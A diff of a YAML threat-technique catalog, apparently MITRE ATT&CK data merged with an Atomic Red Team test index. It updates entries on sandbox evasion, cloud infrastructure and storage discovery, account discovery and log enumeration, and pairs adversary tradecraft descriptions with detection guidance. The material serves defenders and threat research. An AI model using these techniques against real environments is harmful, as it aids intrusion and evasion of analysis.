+        description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+          2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1497.003:
+    technique:
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -50066,6 +50714,12 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -50075,9 +50729,14 @@ discovery:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -50087,97 +50746,132 @@ discovery:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1580:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Cloud Infrastructure Discovery
+      description: |-
+        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: discovery
       x_mitre_contributors:
       - Regina Elwell
       - Praetorian
       - Isif Ibrahima, Mandiant
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+        components. Monitor logs for actions that could be taken to gather information
+        about cloud infrastructure, including the use of discovery API calls by new
+        or unexpected users and enumerations from unknown or malicious IP addresses.
+        To reduce false positives, valid change management procedures could introduce
+        a known identifier that is logged with the change (e.g., tag or header) if
+        supported by the cloud provider, to help distinguish valid, expected actions
+        from malicious ones.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests:
     - name: AWS - EC2 Enumeration from Cloud Instance
@@ -50291,7 +50985,7 @@ discovery:
           fi
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -50345,7 +51039,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests: []
   T1016:
@@ -50375,7 +51068,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -50413,12 +51106,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests: []
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50445,14 +51137,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -50481,7 +51172,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -50541,7 +51231,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -50560,7 +51250,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -50629,12 +51318,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests: []
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -50711,40 +51399,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests: []
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50756,6 +51415,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -50766,8 +51429,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -50777,9 +51446,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -50812,7 +51500,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50830,7 +51518,6 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests:
     - name: AWS S3 Enumeration
@@ -50859,7 +51546,7 @@ discovery:
         elevation_required: false
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50867,11 +51554,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -50882,7 +51572,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -50896,6 +51586,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50915,56 +51609,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -50986,19 +51635,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
